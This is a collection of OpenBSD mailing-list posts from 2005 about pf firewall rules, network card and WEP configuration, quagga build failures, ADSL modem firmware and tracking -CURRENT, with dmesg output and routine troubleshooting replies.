> block drop in log on sis2 inet proto icmp from any to 172.16.0.0/16
> pass in log on sis2 inet proto tcp from 172.20.1.10 to 172.16.0.0/16 keep
> state
> pass in log on sis2 inet proto udp from 172.20.1.10 to 172.16.0.0/16 keep
> state
> pass in log on sis2 inet proto icmp from 172.20.1.10 to 172.16.0.0/16 keep
> state
> pass out log on sis2 inet proto tcp from 172.20.0.1 to 172.20.0.0/16 keep
> state
> pass out log on sis2 inet proto udp from 172.20.0.1 to 172.20.0.0/16 keep
> state
> pass out log on sis2 inet proto icmp from 172.20.0.1 to 172.20.0.0/16 keep
> state
> pass in log on sis1 inet proto tcp from 172.16.0.0/16 to any modulate state
> pass in log on sis1 inet proto udp from 172.16.0.0/16 to any keep state
> pass in log on sis1 inet proto icmp from 172.16.0.0/16 to any keep state
> block drop in log on sis1 inet proto tcp from any to 172.20.0.0/16
> block drop in log on sis1 inet proto udp from any to 172.20.0.0/16
> block drop in log on sis1 inet proto icmp from any to 172.20.0.0/16
> pass out log on sis1 inet proto tcp from 172.16.0.1 to 172.16.0.0/16 keep
> state
> pass out log on sis1 inet proto udp from 172.16.0.1 to 172.16.0.0/16 keep
> state
> pass out log on sis1 inet proto icmp from 172.16.0.1 to 172.16.0.0/16 keep
> state
> [sis0 rules snipped]
> 
> Kind regards,
> Jimmy Scott
> 
> --
> The Four Horsemen of the Apocalypse: Death, Famine, War, and SNMP
> 
> [demime 1.01d removed an attachment of type application/pgp-signature]
> 

I think you might have the concept of "in" and "out" rules confused.
Visualize yourself sitting in the computer between the three interfaces.
>From that perspective, "in" rules mean a packet coming from a remote
host to you through one of those interfaces.  Conversely "out" rules
mean a packet leaving from the local machine to some remote host.

Give something like this a whirl for starters.  Caution, I have not
tested these!  You also likely need to allow packets from the Internet
into your DMZ.

# pf.conf
scrub in all no-df fragment reassemble
scrub out all no-df random-id fragment reassemble
block drop in log all
block drop log inet6 all
block drop in log quick on sis0 from any to (sis0:broadcast)
block drop in log quick on sis0 from  to any
pass log quick on lo0 inet from 127.0.0.0/8 to any
pass log quick on lo0 inet6 from ::1 to any

# LAN interface
pass in on sis2 inet proto tcp \
  from 172.20.0.0/16 to !172.16.0.0/16 modulate state
pass in on sis2 inet proto udp \
  from 172.20.0.0/16 to !172.16.0.0/16 keep state
pass in on sis2 inet proto icmp \
  from 172.20.0.0/16 to !172.16.0.0/16 keep state
pass in on sis2 inet proto tcp \
  from 172.20.1.10 to any modulate state
pass in on sis2 inet proto udp \
  from 172.20.1.10 to any keep state
pass in on sis2 inet proto icmp \
  from 172.20.1.10 to any keep state
block out on sis2 all # nothing gets out unless state or rule allows it
# not sure why you want these rules here, what's the firewall doing?
pass out on sis2 inet proto tcp \
  from 172.20.0.1 to 172.20.0.0/16 keep state
pass ou

Re: Building a bootable CF w/ a RAM-disk kernel

[J Moore]

On Sun, Nov 13, 2005 at 07:52:04PM +1100, the unit calling itself Damien Miller 
wrote:
> On Sat, 12 Nov 2005 21:54:42 -0600
> J Moore <[EMAIL PROTECTED]> wrote:
> 
> > The readme file in flashboot contains an overview of building the 
> > ram-disk kernel. What it doesn't explain is how to install the kernel on 
> > the CF, or prepare the CF for booting the kernel.
> 
> There are some extra instructions in the latest version of the README:
> http://cvsweb.mindrot.org/index.cgi/~checkout~/flashboot/README?rev=HEAD
> 
> These start by recommending that you read the boot(8) and 
> installboot(8) manpages.

Thanks! In the meantime I turned this up (it's REALLY good)

http://master.iu.hio.no/wiki/index.php/OpenBSD_on_net4801

Jay

(3.8) pf smtp synproxy

[J.D. Bronson]

I have noticed an odd thing. I think someone else reported this 
awhile back...but using pf with synproxy like this:


pass in quick on $EXT_INT proto tcp from any to $SERVERS port 25 
flags S/SA synproxy state


..causes issues. What I see are tons of rejects in pflog all relating 
to yahoo email servers (big surprise here).


Now, if I change 'synproxy' to 'modulate' - things work fine as expected.

So..I was wondering if anyone has a workaround on how to deal 
with 'yahoo'. So far, from installing pf - 'yahoo' is the only 
*legit* system I have seen that is not working with synproxy.


I enjoy this feature however, as I am seeing alot of cable modem IPs 
that are failing with synproxy...so I would like to continue to use it.


Yahoo seems to use smtp servers all over the map...they dont just 
have 1 or 2 netblocks that I could permit via modulate state ahead of 
synproxy state rules.


Any thoughts on this? - I dont consider it a bug at all, but was 
wondering if/how anyone is dealing with this.


I think this is a decent feature to have and use - if I can find a workaround.

Perhaps a table or something, but I may not be able to locate all of 
the yahoo mail server IPs.


Thanks in advance for any tips.

-JD

updating ports

[Thanos Tsouanas]

Hello.

I'm following current, and I usually remove and reinstall all the
ports that i need since they are not that many.  'make update' does a
good job updating a package when there is a newer version in my ports
tree, but:

The out-of-date output displays some ports that need 'updating' even
if there is no newer version for them, but just for some of their
dependencies.  Is there an automated proccess I could follow for them
instead of the traditional and stably-working "remove all and
reinstall all" method?

Thanks.

-- 
Thanos Tsouanas  .: My Music: http://www.thanostsouanas.com/
http://thanos.sians.org/ .: Sians Music: http://www.sians.org/

Re: 3c985b and optiplex gx520

[Scott Tracey - TPSX]

What is the output of this command?

cat /etc/hostname.ti0

It should be something like:

inet addr netmask broadcast_addr options


Do you have a DHCP server on the network?

It seems odd that you have no "blinking lights". I am also not aware of any
compatability issues with your particular card.  Especially since the
boot-up looks clean:

> > > ti0 at pci4 dev 0 function 0 "3Com 3c985" rev 0x01: irq 11 address
> > > 00:60:08:f7:1 7:c4
> > > ti1 at pci4 dev 2 function 0 "3Com 3c985" rev 0x01: irq 3 address
> > > 00:60:08:f7:19 :61

Sorry for the delayed response. I hope you have it working already.

- Original Message - 
From: "Javier Martinez" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; 
Sent: Thursday, November 10, 2005 1:39 PM
Subject: Re: 3c985b and optiplex gx520


> I disconnected all the interfaces and after connected only one.
>
> I'm sure that the cables are working. I tried with these options in the
> hostname.ti0, each time I configured with one of these and reboot the
> computer:
>
> media 1000baseSX
> media 1000baseSX mediaopt full-duplex
> media autoselect
>
> And my ifconfig -a results:
>
> lo0: flags=8049 mtu 33224
> groups: lo
> inet 127.0.0.1 netmask 0xff00
> inet6 ::1 prefixlen 128
> inet6 fe80::1%lo0 prefixlen 64 scopeid 0x5
> ti0: flags=8802 mtu 1500
> lladdr 00:60:08:f7:19:61
> media: Ethernet 1000baseSX (autoselect)
> status: no carrier
> pflog0: flags=0<> mtu 33224
> pfsync0: flags=0<> mtu 1348
> enc0: flags=0<> mtu 1536
>
>
> Any idea???
> Do you know about a problem with these hardware bond??
>
>
> On Wed, Nov 09, 2005 at 08:24:58PM -0500, [EMAIL PROTECTED] wrote:
> > Start by reviewing http://www.openbsd.org/faq/faq6.html#Intro
> >
> > Focus on the physical aspects of the connection before the PC/OS
> > configuration stuff.
> >
> > Disconnect one of the nic card cables from the switch. Try to get one
card
> > up before the other.
> >
> > Do you know if the cables you are using work on another PC? Verify that
> > before moving on.
> >
> > What does the following command reveal?
> >
> > ifconfig -a
> >
> > What do these commands reveal?
> >
> > cat /etc/hostname.ti0
> > cat /etc/hostname.ti1
> >
> >
> > > Hi,
> > >
> > > I have a problem with a dell optiplex gx520 and a 3com985 gigabit nic.
> > > I installed OpenBSD 3.8 and everything is ok, I can see the nic in the
> > > ifconfig, but when I connected it to the switch I didn't get the link,
the
> > > leds
> > > in both sides are turn off, I can't get the link light.
> > >
> > > Do yo have any idea what can I do??
> > >
> > > I sent you the dmesg output. Thanks a lot
> > >
> > > OpenBSD 3.8 (GENERIC) #138: Sat Sep 10 15:41:37 MDT 2005
> > > [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
> > > cpu0: Intel(R) Pentium(R) 4 CPU 2.80GHz ("GenuineIntel" 686-class)
2.80
> > > GHz
> > > cpu0:
> > >
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CF
> > > LUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,CNXT-ID
> > > real mem  = 526520320 (514180K)
> > > avail mem = 473497600 (462400K)
> > > using 4278 buffers containing 26427392 bytes (25808K) of memory
> > > mainbus0 (root)
> > > bios0 at mainbus0: AT/286+(00) BIOS, date 08/05/05, BIOS32 rev. 0 @
> > > 0xffe90
> > > apm0 at bios0: Power Management spec V1.2
> > > apm0: AC on, battery charge unknown
> > > apm0: flags 30102 dobusy 0 doidle 1
> > > pcibios0 at bios0: rev 2.1 @ 0xf/0x1
> > > pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xfed10/240 (13 entries)
> > > pcibios0: PCI Interrupt Router at 000:31:0 ("Intel 82801GB LPC" rev
0x00)
> > > pcibios0: PCI bus #4 is the last bus
> > > bios0: ROM list: 0xc/0xa800! 0xca800/0x1800
> > > cpu0 at mainbus0
> > > pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
> > > pchb0 at pci0 dev 0 function 0 "Intel 82945GP" rev 0x02
> > > ppb0 at pci0 dev 1 function 0 "Intel 82945GP PCIE" rev 0x02
> > > pci1 at ppb0 bus 1
> > > vga1 at pci0 dev 2 function 0 vendor "Intel", unknown product 0x2772
rev
> > > 0x02: a perture at 0xfeb0, size 0x800
> > > wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
> > > wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
> > > vendor "Intel", unknown product 0x2776 (class display subclass
> > > miscellaneous, re v 0x02) at pci0 dev 2 function 1 not configured
> > > ppb1 at pci0 dev 28 function 0 "Intel 82801GB PCIE" rev 0x01
> > > pci2 at ppb1 bus 2
> > > bge0 at pci2 dev 0 function 0 "Broadcom BCM5751" rev 0x01, BCM5750 A1
> > > (0x4001): irq 11 address 00:12:3f:52:6d:ca
> > > brgphy0 at bge0 phy 1: BCM5750 10/100/1000baseT PHY, rev. 0
> > > ppb2 at pci0 dev 28 function 1 "Intel 82801GB PCIE" rev 0x01
> > > pci3 at ppb2 bus 3
> > > uhci0 at pci0 dev 29 function 0 "Intel 82801GB USB" rev 0x01: irq 9
> > > usb0 at uhci0: USB revision 1.0
> > > uhub0 at usb0
> > > uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1
> > > uhub0: 2 ports with 2 removable, self powered
> > > uhci1 at pci

Re: WLAN (Linksys WPC111) + WEP

[Darrin Chandler]

Nikolaus Hiebaum wrote:


Darren wrote:

 


wi(4) says: wi is capable of using both 40-bit (5 characters or 10
hexadecimal digits) or 104-bit (13 characters or 26 hexadecimal digits)
keys.

So you'll need either 0xBACE8A21EA as your *hex* key (for 40 bit), or
something else entirely is going with your keys.
   



Thank you! :) It works now! ;-) I thought the '0x' was only to be used for a 
hexadecimal
translation.

Do you know what the second type as mentioned by wi means resp. how the synatx 
would be

[...] or a set of keys of the form ``n:k1,k2,k3,k4'', where `n' specifies which 
of the keys
will be used for transmitted packets, and the four keys, ``k1'' through ``k4'', 
are configured
as WEP keys.  If a set of keys is specified, a comma (`,') [...]

n:BACE8A21EA ? Coz that didn't work.
 

Really, it's a HEX KEY. First, "BACE8A21EA" should be "0xBACE8A21EA". 
Second, it should be "1:0xBACE8A21EA" to specify the first key for 
transmitting. Third, if you only have one key then why use the multikey 
syntax at all? You can just stick with "0xBACE8A21EA" by itself.


--
Darrin Chandler
[EMAIL PROTECTED]
http://www.stilyagin.com/

pf keep state on 3.8

[Jimmy Scott]

Hi misc@,

I finaly had some time to rearrange my network, and split it into 3
parts: LAN, DMZ, WAN.

Basicly, the LAN (172.20) may not access the DMZ (172.16), but host
172.20.1.10 can. the DMZ may not access the LAN, and both can go to the
WAN.

But for some reason, when I create state from 172.20.1.10 to 172.16.x.x;
the packet comming back gets blocked which should not happen because the
state would be checked first and the state really is created?!

I tried setting 'set state-policy floating' explicit, but no advance.
Someone who knows what the problem is here? I had a ruleset with a bunch
of 'quick' rules before instead of this, but had the same problem.

tcpdump on pflog:
18:12:16.483526 rule 12/(match) pass in on sis2: 172.20.1.10.57132 >
172.16.0.5.ssh: [|tcp]
18:12:16.483960 rule 21/(match) block in on sis1: 172.16.0.5.ssh >
172.20.1.10.57132: [|tcp]


grep on state:
# pfctl -s state|grep 172.16.0.5
all tcp 172.16.0.5:22 <- 172.20.1.10:57132   CLOSED:SYN_SENT


kernel:
OpenBSD 3.8 (GENERIC) #138: Sat Sep 10 15:41:37 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC

rules:
scrub in all no-df fragment reassemble
scrub out all no-df random-id fragment reassemble
block drop in log all
block drop log inet6 all
block drop in log quick on sis0 from any to (sis0:broadcast)
block drop in log quick on sis0 from  to any
pass log quick on lo0 inet from 127.0.0.0/8 to any
pass log quick on lo0 inet6 from ::1 to any
pass in log on sis2 inet proto tcp from 172.20.0.0/16 to any modulate state
pass in log on sis2 inet proto udp from 172.20.0.0/16 to any keep state
pass in log on sis2 inet proto icmp from 172.20.0.0/16 to any keep state
block drop in log on sis2 inet proto tcp from any to 172.16.0.0/16
block drop in log on sis2 inet proto udp from any to 172.16.0.0/16
block drop in log on sis2 inet proto icmp from any to 172.16.0.0/16
pass in log on sis2 inet proto tcp from 172.20.1.10 to 172.16.0.0/16 keep
state
pass in log on sis2 inet proto udp from 172.20.1.10 to 172.16.0.0/16 keep
state
pass in log on sis2 inet proto icmp from 172.20.1.10 to 172.16.0.0/16 keep
state
pass out log on sis2 inet proto tcp from 172.20.0.1 to 172.20.0.0/16 keep
state
pass out log on sis2 inet proto udp from 172.20.0.1 to 172.20.0.0/16 keep
state
pass out log on sis2 inet proto icmp from 172.20.0.1 to 172.20.0.0/16 keep
state
pass in log on sis1 inet proto tcp from 172.16.0.0/16 to any modulate state
pass in log on sis1 inet proto udp from 172.16.0.0/16 to any keep state
pass in log on sis1 inet proto icmp from 172.16.0.0/16 to any keep state
block drop in log on sis1 inet proto tcp from any to 172.20.0.0/16
block drop in log on sis1 inet proto udp from any to 172.20.0.0/16
block drop in log on sis1 inet proto icmp from any to 172.20.0.0/16
pass out log on sis1 inet proto tcp from 172.16.0.1 to 172.16.0.0/16 keep
state
pass out log on sis1 inet proto udp from 172.16.0.1 to 172.16.0.0/16 keep
state
pass out log on sis1 inet proto icmp from 172.16.0.1 to 172.16.0.0/16 keep
state
[sis0 rules snipped]

Kind regards,
Jimmy Scott

--
The Four Horsemen of the Apocalypse: Death, Famine, War, and SNMP

[demime 1.01d removed an attachment of type application/pgp-signature]

Re: WLAN (Linksys WPC111) + WEP

[Nikolaus Hiebaum]

* Nikolaus Hiebaum wrote on Nov 13, 2005 [17:35, +0100] :

> Thank you! :) It works now! ;-) I thought the '0x' was only to be used for a 
> hexadecimal
> translation.

One last question: With which application can I measure the strength of the 
signal or if there
are other WLAN around, preferably a GUI.

-- 
Beste Gr|_e / Best regards ,
Nikolaus Hiebaum

Re: WLAN (Linksys WPC111) + WEP

[Nikolaus Hiebaum]

Darren wrote:

> wi(4) says: wi is capable of using both 40-bit (5 characters or 10
> hexadecimal digits) or 104-bit (13 characters or 26 hexadecimal digits)
> keys.
>
> So you'll need either 0xBACE8A21EA as your *hex* key (for 40 bit), or
> something else entirely is going with your keys.

Thank you! :) It works now! ;-) I thought the '0x' was only to be used for a 
hexadecimal
translation.

Do you know what the second type as mentioned by wi means resp. how the synatx 
would be

[...] or a set of keys of the form ``n:k1,k2,k3,k4'', where `n' specifies which 
of the keys
will be used for transmitted packets, and the four keys, ``k1'' through ``k4'', 
are configured
as WEP keys.  If a set of keys is specified, a comma (`,') [...]

n:BACE8A21EA ? Coz that didn't work.

-- 
Beste Gr|_e / Best regards ,
Nikolaus Hiebaum

Re: WLAN (Linksys WPC111) + WEP

[Darrin Chandler]

Nikolaus Hiebaum wrote:


* Darrin Chandler wrote on Nov 13, 2005 [08:16, -0700] :

 


ifconfig wi0 192.168.0.21 255.255.255.0 nwid scyld nwkey BACE8A21EA up


 


Not sure if it was just a typo in your email, but I think you want the
nwkey as hex, ... nwid 0xBACE8A21EA ...
   



* Darrin Chandler wrote on Nov 13, 2005 [08:19, -0700] :

 


Typo in *my* last email. You want nwkey as hex, not nwid!
   



O.K., so I translated the whole BACE8A21EA into 0x42414345384132314541 and gave 
it a try.

Same thing as before. ifconfig, netstat and the AP tell me, I am all connected 
just fine, but
I cannot ping an IP (not even the router).

 

wi(4) says: wi is capable of using both 40-bit (5 characters or 10 
hexadecimal digits) or 104-bit (13 characters or 26 hexadecimal digits) 
keys.


So you'll need either 0xBACE8A21EA as your *hex* key (for 40 bit), or 
something else entirely is going with your keys.


--
Darrin Chandler
[EMAIL PROTECTED]
http://www.stilyagin.com/

quagga woes

[brtw2003]

hi list,

i'm quite curious when the port: net/quagga will be fixed, because
also with the latest cvs-snapshot from the quagga site, i'm still
not able to compile it :-(

details:
OpenBSD 3.7 (i386)

output from the port tree:
--SNIP---
Making all in
zebra
source='/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c'
object='kernel_socket.o' libtool=no  depfile='.deps/kernel_socket.Po'
tmpdepfile='.deps/kernel_socket.TPo'  depmode=gcc3 /bin/sh
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/depcomp  cc
-DHAVE_CONFIG_H -DSYSCONFDIR=\"/etc/zebra/\" -DMULTIPATH_NUM=1 -I.
-I/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra -I.. -I..
-I/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4
-I/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/lib -O2 -pipe -c
`test -f
'/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c'
|| echo
'/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/'`/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:79:
error: `RTM_OLDADD' undeclared here (not in a
function)
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:79:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:79:
error: (near initialization for
`rtm_type_str[8].key')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:79:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:79:
error: (near initialization for
`rtm_type_str[8]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:80:
error: `RTM_OLDDEL' undeclared here (not in a
function)
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:80:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:80:
error: (near initialization for
`rtm_type_str[9].key')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:80:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:80:
error: (near initialization for
`rtm_type_str[9]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:81:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:81:
error: (near initialization for
`rtm_type_str[10]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:82:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:82:
error: (near initialization for
`rtm_type_str[11]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:83:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:83:
error: (near initialization for
`rtm_type_str[12]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:84:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:84:
error: (near initialization for
`rtm_type_str[13]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:95:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:95:
error: (near initialization for
`rtm_type_str[14]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:97:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:97:
error: (near initialization for `rtm_type_str[15]')
*** Error code 1
--SNIP---


output from the current snapshot:

--SNIP---
./configure --prefix=/opt/quagga --enable-isisd --enable-ospf-te
--enable-isis-topology --enable-vtysh


Quagga configuration
host operationg system  : openbsd3.8
source code location: .
compiler: gcc
compiler flags  : -Os -fno-omit-frame-pointer -g  -Wall
-Wsign-compare -Wpointer-arith -Wbad-function-cast -Wwrite-strings
-Wmissing-prototypes -Wmissing-declarations -Wchar-subscripts -Wcast-qual
includes:
linker flags:  -lm -lresolv -ltermcap -lreadline
state file directory: /var/run
config file directory   : /opt/quagga/etc
example directory   : /opt/quagga/etc
user to run as  : quagga
group to run as : quagga
group for vty sockets   :
config file mask: 0600
log file mask   : 0600



thread.c: In function `cpu_record_hash_key':
thread.c:91: error: `uintptr_t' undeclared (first use in this function)
thread.c:91: error: (Each undeclared identifier is reported only once
thread.c:91: error: for each function it appears in.)
thread.c:91: e

Re: WLAN (Linksys WPC111) + WEP

[Nikolaus Hiebaum]

* Darrin Chandler wrote on Nov 13, 2005 [08:16, -0700] :

> >ifconfig wi0 192.168.0.21 255.255.255.0 nwid scyld nwkey BACE8A21EA up
> >
> >
> Not sure if it was just a typo in your email, but I think you want the
> nwkey as hex, ... nwid 0xBACE8A21EA ...

* Darrin Chandler wrote on Nov 13, 2005 [08:19, -0700] :

> Typo in *my* last email. You want nwkey as hex, not nwid!

O.K., so I translated the whole BACE8A21EA into 0x42414345384132314541 and gave 
it a try.

Same thing as before. ifconfig, netstat and the AP tell me, I am all connected 
just fine, but
I cannot ping an IP (not even the router).

-- 
Beste Gr|_e / Best regards ,
Nikolaus Hiebaum

Re: WLAN (Linksys WPC111) + WEP

[Darrin Chandler]

Typo in *my* last email. You want nwkey as hex, not nwid!

--
Darrin Chandler
[EMAIL PROTECTED]
http://www.stilyagin.com/

Re: WLAN (Linksys WPC111) + WEP

[Darrin Chandler]

Nikolaus Hiebaum wrote:


ifconfig wi0 192.168.0.21 255.255.255.0 nwid scyld nwkey BACE8A21EA up
 

Not sure if it was just a typo in your email, but I think you want the 
nwkey as hex, ... nwid 0xBACE8A21EA ...


--
Darrin Chandler
[EMAIL PROTECTED]
http://www.stilyagin.com/

Re: OpenBSD as a router for my ADSL ?

[Stuart Henderson]

Thanks, I've just looked again at ueagle(4), it looks like the device 
appears as ugen before the firmware is programmed into it. If you 
didn't install it (into /etc/firmware), you need to do so - the files 
are at .


If that doesn't help, I think you also need to send output from 
'usbdevs -v'.


--On 13 November 2005 17:18 +0400, Bruno Carnazzi wrote:


OpenBSD 3.8 (GENERIC) #138: Sat Sep 10 15:41:37 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel Pentium II ("GenuineIntel" 686-class, 512KB L2 cache) 233
MHz cpu0:
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,MM
X,FXSR real mem  = 33071104 (32296K)
avail mem = 22192128 (21672K)
using 429 buffers containing 1757184 bytes (1716K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(63) BIOS, date 09/07/98, BIOS32 rev. 0 @
0xfc2c0 apm0 at bios0: Power Management spec V1.2
apm0: battery life expectancy 100%
apm0: AC on, battery charge high, estimated 3:26 hours
apm0: flags 20102 dobusy 0 doidle 1
pcibios0 at bios0: rev 2.1 @ 0xf/0x1
pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xf01c0/96 (4 entries)
pcibios0: PCI Interrupt Router at 000:07:0 ("Intel 82371FB ISA" rev
0x00) pcibios0: PCI bus #2 is the last bus
WARNING: can't reserve area for I/O APIC.
WARNING: can't reserve area for Local APIC.
bios0: ROM list: 0xc/0xc000
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Intel 82443BX" rev 0x02
cbb0 at pci0 dev 2 function 0 "Toshiba ToPIC97 CardBus" rev 0x05: irq
11 cbb1 at pci0 dev 2 function 1 "Toshiba ToPIC97 CardBus" rev 0x05:
irq 11 vga1 at pci0 dev 4 function 0 "Chips and Technologies 6"
rev 0xc6 wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
pcib0 at pci0 dev 7 function 0 "Intel 82371AB PIIX4 ISA" rev 0x02
pciide0 at pci0 dev 7 function 1 "Intel 82371AB IDE" rev 0x01: DMA,
channel 0 wired to compatibility, channel 1 wired to compatibility
wd0 at pciide0 channel 0 drive 0: 
wd0: 16-sector PIO, LBA, 4126MB, 8452080 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2
atapiscsi0 at pciide0 channel 1 drive 0
scsibus0 at atapiscsi0: 2 targets
cd0 at scsibus0 targ 0 lun 0:  SCSI0 5/cdrom
removable cd0(pciide0:1:0): using PIO mode 4, DMA mode 2
uhci0 at pci0 dev 7 function 2 "Intel 82371AB USB" rev 0x01: irq 11
usb0 at uhci0: USB revision 1.0
uhub0 at usb0
uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub0: 2 ports with 2 removable, self powered
"Intel 82371AB Power" rev 0x02 at pci0 dev 7 function 3 not configured
"Toshiba Fast Infrared Type O" rev 0x23 at pci0 dev 10 function 0 not
configured cardslot0 at cbb0 slot 0 flags 0
cardbus0 at cardslot0: bus 1 device 0 cacheline 0x0, lattimer 0x0
pcmcia0 at cardslot0
cardslot1 at cbb1 slot 1 flags 0
cardbus1 at cardslot1: bus 2 device 0 cacheline 0x0, lattimer 0x0
pcmcia1 at cardslot1
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pms0 at pckbc0 (aux slot)
pckbc0: using irq 12 for aux slot
wsmouse0 at pms0 mux 0
sb0 at isa0 port 0x220/24 irq 5 drq 1: dsp v3.01
midi0 at sb0: 
audio0 at sb0
opl0 at sb0: model OPL3
midi1 at opl0: 
wss0 at isa0 port 0x530/8 irq 10 drq 0: CS4231 or AD1845 (vers 4)
audio1 at wss0
pcppi0 at isa0 port 0x61
midi2 at pcppi0: 
spkr0 at pcppi0
sysbeep0 at pcppi0
lpt0 at isa0 port 0x378/4 irq 7
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
biomask eb4d netmask eb4d ttymask fbcf
pctr: 686-class user-level performance counters enabled
mtrr: Pentium Pro MTRR support
ne3 at pcmcia0 function 0 "PCMCIA, FastEthernet, V" port 0xa300/32
ne3: address 00:10:60:f6:71:29
dkcsum: wd0 matches BIOS drive 0x80
root on wd0a
rootdev=0x0 rrootdev=0x300 rawdev=0x302
ugen0 at uhub0 port 1
ugen0: Analog Devices Eagle II, rev 1.10/50.00, addr 2
ugen0: at uhub0 port 1 (addr 2) disconnected
ugen0 detached
ugen0 at uhub0 port 1
ugen0: Analog Devices Eagle II, rev 1.10/50.00, addr 2
ugen0: at uhub0 port 1 (addr 2) disconnected
ugen0 detached

Re: Instructions for tracking -CURRENT

[Alari Kask]

> From: Alari Kask <[EMAIL PROTECTED]>
> Date: November 11, 2005 1:51:12 PM GMT+02:00
> To: Nick Holland <[EMAIL PROTECTED]>
> Subject: Re: Instructions for tracking -CURRENT
>
>
> On Nov 11, 2005, at 4:57 AM, Nick Holland wrote:
>
>> Alari Kask wrote:
>> ... [I *refuse* to post that link again]
>>
>> I was right, more damage than good.
>>
>> I *really* wish people would quit accomplishing one little thing,
>> writing it up in "HOWTO" form, and patting themselves on the back and
>> thinking they were doing the world some kind of favor by  
>> publishing it.
>>
>> YOU ARE NOT.
>> I pity the fool who thinks that seeing something in print makes it
>> somehow true.  There are a lot of such fools, unfortunately.  "Oh,  
>> look,
>> I found it on a web page, it must be true!"
>>
>> In the free world, you have the right to speak and write as you wish,
>> regardless of the accuracy, but I will warn people: THINK,  
>> DAMMIT.  Just
>> because someone put it on a web page with an OpenBSD graphic DOES NOT
>> MAKE IT USEFUL or even close to accurate.
>>
>> With this document, you try to lead people on a long path that  
>> will only
>> sometimes get them where they want to go, and yet, the direct route
>> (snapshots) is simpler, safer and faster.  The long route has  
>> twists and
>> turns you do not warn people about.
>>
>> Nick.
>>
>
> Actually, these instructions were for myself, but i thought i'd  
> share it with the community of openbsd,
> guess it wasnt't such a good idea.
> Yes, installing from a snapshot is easier, but if i want to build a  
> specific part of the system, i dont feel like installing the whole  
> system just to get that specific part, i'll just build it from source.

